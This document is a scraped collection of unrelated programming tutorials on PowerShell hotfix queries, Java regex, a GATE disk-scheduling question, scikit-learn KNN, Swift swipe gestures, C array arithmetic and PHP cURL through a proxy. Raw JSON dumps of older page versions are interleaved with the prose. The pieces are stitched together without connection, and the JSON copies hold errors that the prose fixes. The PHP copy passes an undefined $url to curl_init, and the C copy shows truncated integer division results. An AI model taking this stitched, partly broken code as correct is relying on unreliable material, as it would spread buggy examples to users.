To get the installed windows updates using PowerShell, we can use the Get-HotFix command. This command gets the hotfixes and updates that are installed on the local and the remote computer. This cmdlet is part of the Microsoft.PowerShell.Management module.

Get-HotFix

PS C:\> Get-HotFix
Source        Description HotFixID  InstalledBy          InstalledOn
------        ----------- --------  -----------          -----------
LABMACHINE... Update      KB3191565 LABMACHINE2K12\Ad... 1/15/2021 12:00:00 AM
LABMACHINE... Update      KB2999226 LABMACHINE2K12\Ad... 1/13/2021 12:00:00 AM

In the above output, you can see the source machine name, HotFixID, InstalledBy, and the installed date.

You can also sort the output by the InstalledOn property. For example,

Get-HotFix | Sort-Object InstalledOn -Descending

This command supports the ComputerName parameter, which is a string array, so we can pass multiple remote computers to get the installed hotfixes.

PS C:\> help Get-HotFix -Parameter ComputerName
-ComputerName <System.String[]>
Specifies a remote computer. Type the NetBIOS name, an Internet Protocol (IP) address, or a fully qualified domain name (FQDN) of a remote computer.

For example,

Get-HotFix -ComputerName LabMachine2k12,AD,LabMachine2k16
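If you only want to know whether one particular update is installed, the cmdlet also supports an -Id parameter. A small illustrative example (the KB number below is just a placeholder):

# Check whether a specific update is installed
Get-HotFix -Id KB3191565

# Or test for it in a script without stopping on a "not found" error
if (Get-HotFix -Id KB3191565 -ErrorAction SilentlyContinue) {
   Write-Output "KB3191565 is installed"
}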
[ { "code": null, "e": 1252, "s": 1062, "text": "To get the installed windows updates using PowerShell, we can use the Get-Hotfix command. This command gets the hotfixes and updates that are installed on the local and the remote computer." }, { "code": null, "e": 1321, "s": 1252, "text": "This command is the part of Microsoft.Management.PowerShell utility." }, { "code": null, "e": 1332, "s": 1321, "text": "Get-HotFix" }, { "code": null, "e": 1603, "s": 1332, "text": "PS C:\\> Get-HotFix\nSource Description HotFixID InstalledBy InstalledOn\n------ ----------- -------- ----------- -----------\nLABMACHINE... Update KB3191565 LABMACHINE2K12\\Ad... 1/15/2021 12:00:00 AM\nLABMACHINE... Update KB2999226 LABMACHINE2K12\\Ad... 1/13/2021 12:00:00 AM" }, { "code": null, "e": 1707, "s": 1603, "text": "In the above output, you can see the SourceMachine Name, HotfixID, InstalledBy, and the Installed Date." }, { "code": null, "e": 1771, "s": 1707, "text": "You can also sort it by the InstalledOn parameter. For example," }, { "code": null, "e": 1820, "s": 1771, "text": "Get-HotFix | Sort-Object InstalledOn -Descending" }, { "code": null, "e": 1969, "s": 1820, "text": "This command supports the ComputerName parameter which is a string array so we can pass the multiple remote computers to get the installed hotfixes." }, { "code": null, "e": 2198, "s": 1969, "text": "PS C:\\> help Get-HotFix -Parameter ComputerName\n-ComputerName <System.String[]>\nSpecifies a remote computer. Type the NetBIOS name, an Internet Protocol (IP) address, or a fully qualified domain name (FQDN) of a remote computer." }, { "code": null, "e": 2211, "s": 2198, "text": "For example," }, { "code": null, "e": 2269, "s": 2211, "text": "Get-HotFix -ComputerName LabMachine2k12,AD,LabMachine2k16" } ]
How to match non-digits using Java Regular Expression (RegEx)
You can match non-digit characters using the metacharacter "\\D".

import java.util.Scanner;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Example {
   public static void main(String args[]) {
      // Reading String from user
      System.out.println("Enter a String");
      Scanner sc = new Scanner(System.in);
      String input = sc.nextLine();
      String regex = "\\D";
      // Compiling the regular expression
      Pattern pattern = Pattern.compile(regex);
      // Retrieving the matcher object
      Matcher matcher = pattern.matcher(input);
      int count = 0;
      while(matcher.find()) {
         count++;
      }
      System.out.println("Number of non-digit characters: "+count);
   }
}

Enter a String
sample text 2425 36
Number of non-digit characters: 13

import java.util.Scanner;
public class RegexExample {
   public static void main( String args[] ) {
      // regular expression that accepts exactly 10 non-digit characters
      String regex = "\\D{10}";
      System.out.println("Enter input value: ");
      Scanner sc = new Scanner(System.in);
      String input = sc.nextLine();
      boolean result = input.matches(regex);
      if(result) {
         System.out.println("input matched");
      }
      else {
         System.out.println("wrong input");
      }
   }
}

Enter input value:
sample abc
input matched

Enter input value:
sample1234
wrong input
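A closely related task is stripping the digits out instead of counting the non-digit characters; String.replaceAll() accepts the same kind of metacharacter. A small illustrative sketch:

public class StripDigits {
   public static void main(String[] args) {
      String input = "sample text 2425 36";
      // Delete every digit, keeping only the non-digit characters
      String nonDigits = input.replaceAll("\\d", "");
      // Prints "sample text" followed by the spaces that remain
      System.out.println(nonDigits);
   }
}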
[ { "code": null, "e": 1128, "s": 1062, "text": "You can match non-digit character using the meta character \"\\\\D\"." }, { "code": null, "e": 1793, "s": 1128, "text": "import java.util.Scanner;\nimport java.util.regex.Matcher;\nimport java.util.regex.Pattern;\npublic class Example {\n public static void main(String args[]) {\n //Reading String from user\n System.out.println(\"Enter a String\");\n Scanner sc = new Scanner(System.in);\n String input = sc.nextLine();\n String regex = \"\\\\D\";\n //Compiling the regular expression\n Pattern pattern = Pattern.compile(regex);\n //Retrieving the matcher object\n Matcher matcher = pattern.matcher(input);\n int count = 0;\n while(matcher.find()) {\n count++;\n }\n System.out.println(\"Number non-digit characters: \"+count);\n }\n}" }, { "code": null, "e": 1860, "s": 1793, "text": "Enter a String\nsample text 2425 36\nNumber non-digit characters: 13" }, { "code": null, "e": 2361, "s": 1860, "text": "import java.util.Scanner;\npublic class RegexExample {\n public static void main( String args[] ) {\n //regular expression to accept 5 letter word\n String regex = \"\\\\D{10}\";\n System.out.println(\"Enter input value: \");\n Scanner sc = new Scanner(System.in);\n String input = sc.nextLine();\n boolean result = input.matches(regex);\n if(result) {\n System.out.println(\"input matched\");\n }\n else {\n System.out.println(\"wrong input\");\n }\n }\n}" }, { "code": null, "e": 2405, "s": 2361, "text": "Enter input value:\nsample abc\ninput matched" }, { "code": null, "e": 2447, "s": 2405, "text": "Enter input value:\nsample1234\nwrong input" } ]
GATE | GATE-CS-2015 (Set 1) | Question 65 - GeeksforGeeks
19 Feb, 2021

Suppose the following disk request sequence (track numbers) for a disk with 100 tracks is given: 45, 20, 90, 10, 50, 60, 80, 25, 70. Assume that the initial position of the R/W head is on track 50. The additional distance that will be traversed by the R/W head when the Shortest Seek Time First (SSTF) algorithm is used compared to the SCAN (Elevator) algorithm (assuming that the SCAN algorithm moves towards 100 when it starts execution) is _________ tracks

(A) 8
(B) 9
(C) 10
(D) 11

Answer: (C)

Explanation: In Shortest Seek Time First (SSTF), the request closest to the current position of the head is serviced next. In the SCAN (or Elevator) algorithm, requests are serviced only in the current direction of arm movement until the arm reaches the edge of the disk. When this happens, the direction of the arm reverses, and the requests that were remaining in the opposite direction are serviced, and so on.

Given a disk with 100 tracks and the sequence 45, 20, 90, 10, 50, 60, 80, 25, 70, with the initial position of the R/W head on track 50.

In SSTF, requests are served as follows:

Next Served    Distance Traveled
 50                  0
 45                  5
 60                 15
 70                 10
 80                 10
 90                 10
 25                 65
 20                  5
 10                 10
-----------------------------------
Total Dist = 130

If simple SCAN is used, requests are served as follows:

Next Served    Distance Traveled
 50                  0
 60                 10
 70                 10
 80                 10
 90                 10
 45                 65  [the arm continues to the last track (100), then reverses to 45]
 25                 20
 20                  5
 10                 10
-----------------------------------
Total Dist = 140

Distance saved by SSTF = 140 - 130 = 10

Therefore, SSTF does not traverse additional distance here; it traverses 10 tracks less than SCAN.
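The totals are easy to verify mechanically. A short, illustrative Python sketch (not part of the original question) that simulates both policies:

requests = [45, 20, 90, 10, 60, 80, 25, 70]  # track 50 is the initial head position
head = 50

# SSTF: repeatedly service the closest pending request
pending, pos, sstf = list(requests), head, 0
while pending:
    nxt = min(pending, key=lambda t: abs(t - pos))
    sstf += abs(nxt - pos)
    pos = nxt
    pending.remove(nxt)

# SCAN: sweep up to the edge (track 100, as assumed in the table above),
# then reverse and sweep down to the lowest request
edge = 100
scan = (edge - head) + (edge - min(requests))

print(sstf, scan, scan - sstf)   # prints: 130 140 10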
[ { "code": null, "e": 24604, "s": 24576, "text": "\n19 Feb, 2021" }, { "code": null, "e": 25226, "s": 24604, "text": "Suppose the following disk request sequence (track numbers) for a disk with 100 tracks is given: 45, 20, 90, 10, 50, 60, 80, 25, 70. Assume that the initial position of the R/W head is on track 50. The additional distance that will be traversed by the R/W head when the Shortest Seek Time First (SSTF) algorithm is used compared to the SCAN (Elevator) algorithm (assuming that SCAN algorithm moves towards 100 when it starts execution) is _________ tracks(A) 8(B) 9(C) 10(D) 11Answer: (C)Explanation: In Shortest seek first (SSTF), closest request to the current position of the head, and then services that request next." }, { "code": null, "e": 25513, "s": 25226, "text": "In SCAN (or Elevator) algorithm, requests are serviced only in the current direction of arm movement until the arm reaches the edge of the disk. When this happens, the direction of the arm reverses, and the requests that were remaining in the opposite direction are serviced, and so on." }, { "code": null, "e": 26515, "s": 25513, "text": "Given a disk with 100 tracks \n\nAnd Sequence 45, 20, 90, 10, 50, 60, 80, 25, 70.\n\nInitial position of the R/W head is on track 50.\n\nIn SSTF, requests are served as following\n\nNext Served Distance Traveled\n 50 0\n 45 5\n 60 15 \n 70 10 \n 80 10 \n 90 10\n 25 65 \n 20 5 \n 10 10\n----------------------------------- \nTotal Dist = 130\n\n\nIf Simple SCAN is used, requests are served as following\n\nNext Served Distance Traveled\n 50 0\n 60 10 \n 70 10 \n 80 10 \n 90 10\n 45 65 [disk arm goes to 99, then to 45]\n 25 20 \n 20 5 \n 10 10\n----------------------------------- \nTotal Dist = 140\n\n\nLess Distance traveled in SSTF = 130 - 140 = 10 " }, { "code": null, "e": 26600, "s": 26515, "text": "Therefore, it is not additional but it is less distance traversed by SSTF than SCAN." }, { "code": null, "e": 26622, "s": 26600, "text": "Quiz of this Question" }, { "code": null, "e": 26643, "s": 26622, "text": "GATE-CS-2015 (Set 1)" }, { "code": null, "e": 26669, "s": 26643, "text": "GATE-GATE-CS-2015 (Set 1)" }, { "code": null, "e": 26674, "s": 26669, "text": "GATE" }, { "code": null, "e": 26772, "s": 26674, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26781, "s": 26772, "text": "Comments" }, { "code": null, "e": 26794, "s": 26781, "text": "Old Comments" }, { "code": null, "e": 26828, "s": 26794, "text": "GATE | GATE-IT-2004 | Question 71" }, { "code": null, "e": 26861, "s": 26828, "text": "GATE | GATE CS 2011 | Question 7" }, { "code": null, "e": 26903, "s": 26861, "text": "GATE | GATE-CS-2015 (Set 3) | Question 65" }, { "code": null, "e": 26945, "s": 26903, "text": "GATE | GATE-CS-2016 (Set 2) | Question 48" }, { "code": null, "e": 26987, "s": 26945, "text": "GATE | GATE-CS-2014-(Set-3) | Question 38" }, { "code": null, "e": 27021, "s": 26987, "text": "GATE | GATE CS 2018 | Question 37" }, { "code": null, "e": 27063, "s": 27021, "text": "GATE | GATE-CS-2016 (Set 1) | Question 65" }, { "code": null, "e": 27097, "s": 27063, "text": "GATE | GATE-IT-2004 | Question 83" }, { "code": null, "e": 27139, "s": 27097, "text": "GATE | GATE-CS-2016 (Set 1) | Question 63" } ]
ML | Implementation of KNN classifier using Sklearn - GeeksforGeeks
28 Nov, 2019

Prerequisite: K-Nearest Neighbours Algorithm

K-Nearest Neighbors is one of the most basic yet essential classification algorithms in Machine Learning. It belongs to the supervised learning domain and finds intense application in pattern recognition, data mining and intrusion detection. It is widely applicable in real-life scenarios since it is non-parametric, meaning, it does not make any underlying assumptions about the distribution of data (as opposed to other algorithms such as GMM, which assume a Gaussian distribution of the given data).

This article will demonstrate how to implement the K-Nearest neighbors classifier algorithm using the Sklearn library of Python.

Step 1: Importing the required Libraries

import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
import matplotlib.pyplot as plt
import seaborn as sns

Step 2: Reading the Dataset

import os

# Changing the working directory to the location of the data file
os.chdir(r'C:\Users\Dev\Desktop\Kaggle\Breast_Cancer')

df = pd.read_csv('data.csv')

y = df['diagnosis']
X = df.drop('diagnosis', axis = 1)
X = X.drop('Unnamed: 32', axis = 1)
X = X.drop('id', axis = 1)
# Separating the dependent and independent variables

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)
# Splitting the data into training and testing data

Step 3: Training the model

K = []
training = []
test = []
scores = {}

for k in range(2, 21):
    clf = KNeighborsClassifier(n_neighbors = k)
    clf.fit(X_train, y_train)

    training_score = clf.score(X_train, y_train)
    test_score = clf.score(X_test, y_test)
    K.append(k)

    training.append(training_score)
    test.append(test_score)
    scores[k] = [training_score, test_score]

Step 4: Evaluating the model

for keys, values in scores.items():
    print(keys, ':', values)

We now try to find the optimum value for 'k', i.e. the number of nearest neighbors.

Step 5: Plotting the training and test scores graph

ax = sns.stripplot(K, training);
ax.set(xlabel ='values of k', ylabel ='Training Score')
plt.show()
# function to show plot

ax = sns.stripplot(K, test);
ax.set(xlabel ='values of k', ylabel ='Test Score')
plt.show()

plt.scatter(K, training, color ='k')
plt.scatter(K, test, color ='g')
plt.show()
# For overlapping scatter plots

From the above scatter plot, we can come to the conclusion that the optimum value of k will be around 5.
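Once an optimum k has been chosen, the classifier can be refit with that value and used on unseen data. A minimal sketch, reusing the train/test split from above (k = 5 per the conclusion):

# Refit with the chosen number of neighbors
best_clf = KNeighborsClassifier(n_neighbors = 5)
best_clf.fit(X_train, y_train)

# Predict on the held-out test data and report accuracy
predictions = best_clf.predict(X_test)
print(best_clf.score(X_test, y_test))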
[ { "code": null, "e": 24344, "s": 24316, "text": "\n28 Nov, 2019" }, { "code": null, "e": 24389, "s": 24344, "text": "Prerequisite: K-Nearest Neighbours Algorithm" }, { "code": null, "e": 24892, "s": 24389, "text": "K-Nearest Neighbors is one of the most basic yet essential classification algorithms in Machine Learning. It belongs to the supervised learning domain and finds intense application in pattern recognition, data mining and intrusion detection. It is widely disposable in real-life scenarios since it is non-parametric, meaning, it does not make any underlying assumptions about the distribution of data (as opposed to other algorithms such as GMM, which assume a Gaussian distribution of the given data)." }, { "code": null, "e": 25017, "s": 24892, "text": "This article will demonstrate how to implement the K-Nearest neighbors classifier algorithm using Sklearn library of Python." }, { "code": null, "e": 25058, "s": 25017, "text": "Step 1: Importing the required Libraries" }, { "code": "import numpy as npimport pandas as pdfrom sklearn.model_selection import train_test_splitfrom sklearn.neighbors import KNeighborsClassifierimport matplotlib.pyplot as plt import seaborn as sns", "e": 25251, "s": 25058, "text": null }, { "code": null, "e": 25280, "s": 25251, "text": " Step 2: Reading the Dataset" }, { "code": "cd C:\\Users\\Dev\\Desktop\\Kaggle\\Breast_Cancer# Changing the read file location to the location of the file df = pd.read_csv('data.csv') y = df['diagnosis']X = df.drop('diagnosis', axis = 1)X = X.drop('Unnamed: 32', axis = 1)X = X.drop('id', axis = 1)# Separating the dependent and independent variable X_train, X_test, y_train, y_test = train_test_split( X, y, test_size = 0.3, random_state = 0)# Splitting the data into training and testing data", "e": 25741, "s": 25280, "text": null }, { "code": null, "e": 25769, "s": 25741, "text": " Step 3: Training the model" }, { "code": "K = []training = []test = []scores = {} for k in range(2, 21): clf = KNeighborsClassifier(n_neighbors = k) clf.fit(X_train, y_train) training_score = clf.score(X_train, y_train) test_score = clf.score(X_test, y_test) K.append(k) training.append(training_score) test.append(test_score) scores[k] = [training_score, test_score]", "e": 26124, "s": 25769, "text": null }, { "code": null, "e": 26154, "s": 26124, "text": " Step 4: Evaluating the model" }, { "code": "for keys, values in scores.items(): print(keys, ':', values)", "e": 26218, "s": 26154, "text": null }, { "code": null, "e": 26300, "s": 26218, "text": " We now try to find the optimum value for ‘k’ ie the number of nearest neighbors." }, { "code": null, "e": 26352, "s": 26300, "text": "Step 5: Plotting the training and test scores graph" }, { "code": "ax = sns.stripplot(K, training);ax.set(xlabel ='values of k', ylabel ='Training Score') plt.show()# function to show plot", "e": 26477, "s": 26352, "text": null }, { "code": "ax = sns.stripplot(K, test);ax.set(xlabel ='values of k', ylabel ='Test Score')plt.show()", "e": 26567, "s": 26477, "text": null }, { "code": "plt.scatter(K, training, color ='k')plt.scatter(K, test, color ='g')plt.show()# For overlapping scatter plots", "e": 26677, "s": 26567, "text": null }, { "code": null, "e": 26782, "s": 26677, "text": "From the above scatter plot, we can come to the conclusion that the optimum value of k will be around 5." 
}, { "code": null, "e": 26796, "s": 26782, "text": "shubham_singh" }, { "code": null, "e": 26813, "s": 26796, "text": "Machine Learning" }, { "code": null, "e": 26820, "s": 26813, "text": "Python" }, { "code": null, "e": 26837, "s": 26820, "text": "Machine Learning" }, { "code": null, "e": 26935, "s": 26837, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26944, "s": 26935, "text": "Comments" }, { "code": null, "e": 26957, "s": 26944, "text": "Old Comments" }, { "code": null, "e": 26990, "s": 26957, "text": "Support Vector Machine Algorithm" }, { "code": null, "e": 27029, "s": 26990, "text": "k-nearest neighbor algorithm in Python" }, { "code": null, "e": 27064, "s": 27029, "text": "Singular Value Decomposition (SVD)" }, { "code": null, "e": 27120, "s": 27064, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 27153, "s": 27120, "text": "Normalization vs Standardization" }, { "code": null, "e": 27181, "s": 27153, "text": "Read JSON file using Python" }, { "code": null, "e": 27231, "s": 27181, "text": "Adding new column to existing DataFrame in Pandas" }, { "code": null, "e": 27253, "s": 27231, "text": "Python map() function" } ]
How to detect swipe vertically on a ScrollView using Swift?
To detect a swipe on a scroll view, we need to use a small trick, as a scroll view does not natively report the direction of a swipe made on it. We'll see this with the help of an example.

Create an empty project and add a scroll view to the view as per your requirement.

Give it constraints as required by the application.

From the object library, drag and drop a swipe gesture recognizer right above the Scroll View.

Select the gesture recognizer, go to its attribute inspector, and from there, select the swipe option and set the value to "up".

When you do this, your gesture recognizer can now recognize up swipes only. Next, you need to create a method for this swipe gesture.

@IBAction func swipeMade(_ sender: UISwipeGestureRecognizer) {
    if sender.direction == .up {
        print("up swipe made")
        // perform actions here.
    }
}

When you write this code, the recognizer sends events to this method, and if the swipe direction is up, execution enters the if block. You can perform your desired operation there. When we run this code on a device and make a swipe, below is the result that's produced on the console.
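If you prefer to wire everything up in code instead of Interface Builder, the same recognizer can be attached programmatically. A minimal sketch, assuming an outlet named scrollView (a hypothetical name for this example):

override func viewDidLoad() {
    super.viewDidLoad()
    // Create the recognizer, point it at the same action method, and
    // restrict it to upward swipes only
    let swipeUp = UISwipeGestureRecognizer(target: self, action: #selector(swipeMade(_:)))
    swipeUp.direction = .up
    scrollView.addGestureRecognizer(swipeUp)
}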
[ { "code": null, "e": 1247, "s": 1062, "text": "To detect swipe in scrollView we will need to make use of some tricks as scroll view does not natively give the directions of scroll made on it. We’ll see this with help of an example." }, { "code": null, "e": 1325, "s": 1247, "text": "Create an empty project, add scroll view to the view as per your requirement." }, { "code": null, "e": 1378, "s": 1325, "text": "Give them constraint as required in the application." }, { "code": null, "e": 1473, "s": 1378, "text": "From the object library, drag and drop a swipe gesture recognizer right above the Scroll View." }, { "code": null, "e": 1601, "s": 1473, "text": "Select the gesture recognizer, go to its attribute inspector and from there, select the swipe option and set the value as “up”." }, { "code": null, "e": 1733, "s": 1601, "text": "When you do this, now your gesture recognizer can recognize up swipes only. Now you need to create a method for this swipe gesture." }, { "code": null, "e": 1895, "s": 1733, "text": "@IBAction func swipeMade(_ sender: UISwipeGestureRecognizer) {\n if sender.direction == .up {\n print(\"up swipe made\")\n // perform actions here.\n }\n}" }, { "code": null, "e": 2078, "s": 1895, "text": "When you write this code, the recognizer sends events to this method, and if the swipe direction is up, it will come inside the if block. You can perform your desired operation here." }, { "code": null, "e": 2182, "s": 2078, "text": "When we run this code on a device and make a swipe, below is the result that’s produced on the console." } ]
How to perform the arithmetic operations on arrays in C language?
An array is a group of related data items that are stored with a single name.

For example, int student[30]; // student is an array that holds a collection of 30 data items under a single variable name

Searching − It is used to find whether a particular element is present or not.

Sorting − It helps in arranging the elements in an array either in ascending or descending order.

Traversing − It processes every element in an array sequentially.

Inserting − It helps in inserting the elements in an array.

Deleting − It helps in deleting an element in an array.

The logic to perform all arithmetic operations in an array is as follows −

for(i = 0; i < size; i++){
   add[i] = A[i] + B[i];
   sub[i] = A[i] - B[i];
   mul[i] = A[i] * B[i];
   div[i] = (float)A[i] / B[i];
   mod[i] = A[i] % B[i];
}

Following is the C program for arithmetic operations on arrays −

 Live Demo

#include<stdio.h>
int main(){
   int size, i, A[50], B[50];
   int add[50], sub[50], mul[50], mod[50];
   float div[50];
   printf("enter array size:\n");
   scanf("%d", &size);
   printf("enter elements of 1st array:\n");
   for(i = 0; i < size; i++){
      scanf("%d", &A[i]);
   }
   printf("enter the elements of 2nd array:\n");
   for(i = 0; i < size; i++){
      scanf("%d", &B[i]);
   }
   for(i = 0; i < size; i++){
      add[i] = A[i] + B[i];
      sub[i] = A[i] - B[i];
      mul[i] = A[i] * B[i];
      div[i] = (float)A[i] / B[i]; // cast so the division is not truncated to an integer
      mod[i] = A[i] % B[i];
   }
   printf("\n add\t sub\t Mul\t Div\t Mod\n");
   printf("------------------------------------\n");
   for(i = 0; i < size; i++){
      printf("\n%d\t ", add[i]);
      printf("%d \t ", sub[i]);
      printf("%d \t ", mul[i]);
      printf("%.2f\t ", div[i]);
      printf("%d \t ", mod[i]);
   }
   return 0;
}

When the above program is executed, it produces the following result −

Run 1:
enter array size:
2
enter elements of 1st array:
23
45
enter the elements of 2nd array:
67
89
add   sub   Mul    Div    Mod
------------------------------------
90    -44   1541   0.34   23
134   -44   4005   0.51   45

Run 2:
enter array size:
4
enter elements of 1st array:
89
23
12
56
enter the elements of 2nd array:
2
4
7
8
add   sub   Mul   Div     Mod
------------------------------------
91    87    178   44.50   1
27    19    92    5.75    3
19    5     84    1.71    5
64    48    448   7.00    0
[ { "code": null, "e": 1138, "s": 1062, "text": "An array is a group of related data items that are stored with single name." }, { "code": null, "e": 1262, "s": 1138, "text": "For example, int student[30]; //student is an array name that holds 30 collection of data items with a single variable name" }, { "code": null, "e": 1338, "s": 1262, "text": "Searching − It is used to find whether particular element is present or not" }, { "code": null, "e": 1414, "s": 1338, "text": "Searching − It is used to find whether particular element is present or not" }, { "code": null, "e": 1512, "s": 1414, "text": "Sorting − It helps in arranging the elements in an array either in ascending or descending order." }, { "code": null, "e": 1610, "s": 1512, "text": "Sorting − It helps in arranging the elements in an array either in ascending or descending order." }, { "code": null, "e": 1676, "s": 1610, "text": "Traversing − It processes every element in an array sequentially." }, { "code": null, "e": 1742, "s": 1676, "text": "Traversing − It processes every element in an array sequentially." }, { "code": null, "e": 1802, "s": 1742, "text": "Inserting − It helps in inserting the elements in an array." }, { "code": null, "e": 1862, "s": 1802, "text": "Inserting − It helps in inserting the elements in an array." }, { "code": null, "e": 1918, "s": 1862, "text": "Deleting − It helps in deleting an element in an array." }, { "code": null, "e": 1974, "s": 1918, "text": "Deleting − It helps in deleting an element in an array." }, { "code": null, "e": 2049, "s": 1974, "text": "The logic to perform all arithmetic operations in an array is as follows −" }, { "code": null, "e": 2206, "s": 2049, "text": "for(i = 0; i < size; i ++){\n add [i]= A[i] + B[i];\n sub [i]= A[i] - B[i];\n mul [i]= A[i] * B[i];\n div [i] = A[i] / B[i];\n mod [i] = A[i] % B[i];\n}" }, { "code": null, "e": 2271, "s": 2206, "text": "Following is the C program for arithmetic operations on arrays −" }, { "code": null, "e": 2282, "s": 2271, "text": " Live Demo" }, { "code": null, "e": 3166, "s": 2282, "text": "#include<stdio.h>\nint main(){\n int size, i, A[50], B[50];\n int add[10], sub[10], mul[10], mod[10];\n float div[10];\n printf(\"enter array size:\\n\");\n scanf(\"%d\", &size);\n printf(\"enter elements of 1st array:\\n\");\n for(i = 0; i < size; i++){\n scanf(\"%d\", &A[i]);\n }\n printf(\"enter the elements of 2nd array:\\n\");\n for(i = 0; i < size; i ++){\n scanf(\"%d\", &B[i]);\n }\n for(i = 0; i < size; i ++){\n add [i]= A[i] + B[i];\n sub [i]= A[i] - B[i];\n mul [i]= A[i] * B[i];\n div [i] = A[i] / B[i];\n mod [i] = A[i] % B[i];\n }\n printf(\"\\n add\\t sub\\t Mul\\t Div\\t Mod\\n\");\n printf(\"------------------------------------\\n\");\n for(i = 0; i <size; i++){\n printf(\"\\n%d\\t \", add[i]);\n printf(\"%d \\t \", sub[i]);\n printf(\"%d \\t \", mul[i]);\n printf(\"%.2f\\t \", div[i]);\n printf(\"%d \\t \", mod[i]);\n }\n return 0;\n}" }, { "code": null, "e": 3237, "s": 3166, "text": "When the above program is executed, it produces the following result −" }, { "code": null, "e": 3734, "s": 3237, "text": "Run 1:\nenter array size:\n2\nenter elements of 1st array:\n23\n45\nenter the elements of 2nd array:\n67\n89\nadd sub Mul Div Mod\n------------------------------------\n90 -44 1541 0.00 23\n134 -44 4005 0.00 45\nRun 2:\nenter array size:\n4\nenter elements of 1st array:\n89\n23\n12\n56\nenter the elements of 2nd array:\n2\n4\n7\n8\nadd sub Mul Div Mod\n------------------------------------\n91 87 178 44.00 1\n27 19 92 5.00 3\n19 5 84 
1.00 5\n64 48 448 7.00 0" } ]
How to use cURL via a proxy? - GeeksforGeeks
01 Sep, 2020

This tutorial will show the way to use a proxy with PHP's cURL functions. In this tutorial, we'll send our HTTP request via a selected proxy IP address and port.

Why should you use a proxy? There are various reasons why you might want to use a proxy with cURL:

To get around regional filters and country blocks.
Using a proxy IP address allows you to mask or hide your own IP address.
To debug network connection issues.

Using a proxy with PHP's cURL functions: To authenticate with a proxy via cURL and send a HTTP GET request, follow along the code given below and read the instructions specified as comments.

Note: All the credentials and links used are random and used for demo purposes only. Please use your own proxy, credentials and URL.

<?php

// The URL that you want to send
// a cURL proxy request to.
$desturl = 'http://example.net';

// The IP address of the proxy that
// you want to send your request
// through
$proxyipadd = '11.22.33.44';

// The port that the proxy is
// listening on
$proxyport = '1234';

// The username for authenticating
// with the proxy
$proxyuserid = 'testuser';

// The password for authenticating
// with the proxy
$proxypass = 'testpass';

// Initialize curl with the destination URL
$ci = curl_init($desturl);

// Set curl attributes
curl_setopt($ci, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ci, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ci, CURLOPT_HTTPPROXYTUNNEL, 1);

// Set the proxy IP
curl_setopt($ci, CURLOPT_PROXY, $proxyipadd);

// Set the port
curl_setopt($ci, CURLOPT_PROXYPORT, $proxyport);

// Set the username and password
curl_setopt($ci, CURLOPT_PROXYUSERPWD, "$proxyuserid:$proxypass");

// Execute the request
$result = curl_exec($ci);

// Check if any errors
if(curl_errno($ci)){
   throw new Exception(curl_error($ci));
}

// Print the result.
echo $result;
?>

In the above code, we connected to a proxy that needs authentication before sending a simple GET request. If the proxy doesn't require authentication, then you could omit the CURLOPT_PROXYUSERPWD line from your code.

Some errors you might encounter while using curl:

"Failed to connect to 11.22.33.44 port 1234: Timed out" This means that cURL could not connect to the proxy IP address and port used. Make sure that both the IP and port are correct and also check that the proxy is working correctly.

"Failed to connect to 11.22.33.44 port 1234: Connection refused" This error usually occurs when you have specified an incorrect port number, i.e. the IP address of the proxy was correct, but it is not listening for requests on the specified port. There is also the possibility that the server is up, but the software that runs the proxy isn't running.

"Received HTTP code 407 from proxy after CONNECT" The username and password combination that you are using is wrong. Make sure that the username and password are correct and that you are separating them with a colon (:) character.
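Two more options often help when debugging proxy requests: curl_getinfo() for the response status, and CURLOPT_PROXYTYPE for non-HTTP proxies. A short, illustrative sketch reusing the same $ci handle as above:

// Inspect the HTTP status code of the response that came back
// through the proxy (call this after curl_exec)
$status = curl_getinfo($ci, CURLINFO_HTTP_CODE);
if($status != 200){
   echo "Request returned HTTP status: " . $status;
}

// If your proxy is a SOCKS5 proxy rather than an HTTP proxy, tell
// cURL explicitly (set this before curl_exec)
curl_setopt($ci, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);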
[ { "code": null, "e": 24581, "s": 24553, "text": "\n01 Sep, 2020" }, { "code": null, "e": 24743, "s": 24581, "text": "This tutorial will show the way to use a proxy with PHP’s cURL functions. In this tutorial, we’ll send our HTTP request via a selected proxy IP address and port." }, { "code": null, "e": 24850, "s": 24743, "text": "Why should you use a proxy?There are various reasons why you would possibly want to use a proxy with cURL:" }, { "code": null, "e": 25010, "s": 24850, "text": "To get around regional filters and country blocks.Using a proxy IP addresses allows you to mask or hide your own IP address.To debug network connection issues." }, { "code": null, "e": 25061, "s": 25010, "text": "To get around regional filters and country blocks." }, { "code": null, "e": 25136, "s": 25061, "text": "Using a proxy IP addresses allows you to mask or hide your own IP address." }, { "code": null, "e": 25172, "s": 25136, "text": "To debug network connection issues." }, { "code": null, "e": 25358, "s": 25172, "text": "Using a proxy with PHP’s cURL functions: To authenticate with a proxy via cURL and send a HTTP GET request follow along code given below and read the instructions specified as comments." }, { "code": null, "e": 25490, "s": 25358, "text": "Note: All the credentials and links used are random and used for demo purpose only. Please use your own proxy, credentials and URL." }, { "code": "<?php // Initialize URL you that want to// send a cURL proxy request to.$desturl = 'http://example.net'; // The IP address of the proxy that// you want to send your request// through$proxyipadd = '11.22.33.44'; // The port that the proxy is// listening on$proxyport = '1234'; // The username for authenticating// with the proxy$proxyuserid = 'testuser'; // The password for authenticating// with the proxy$proxypass = 'testpass'; // Initialize curl $ci = curl_init($url); // Set curl attributescurl_setopt($ci, CURLOPT_RETURNTRANSFER, true);curl_setopt($ci, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ci, CURLOPT_HTTPPROXYTUNNEL , 1); // Set the proxy IPcurl_setopt($ci, CURLOPT_PROXY, $proxyipadd); // Set the portcurl_setopt($ci, CURLOPT_PROXYPORT, $proxyport); // Set the username and passwordcurl_setopt($ci, CURLOPT_PROXYUSERPWD, \"$proxyuserid:$proxypass\"); // Execute the request$result = curl_exec($ci); // Check if any errorsif(curl_errno($ci)){ throw new Exception(curl_error($ci));} // Print the result.echo $result;?>", "e": 26547, "s": 25490, "text": null }, { "code": 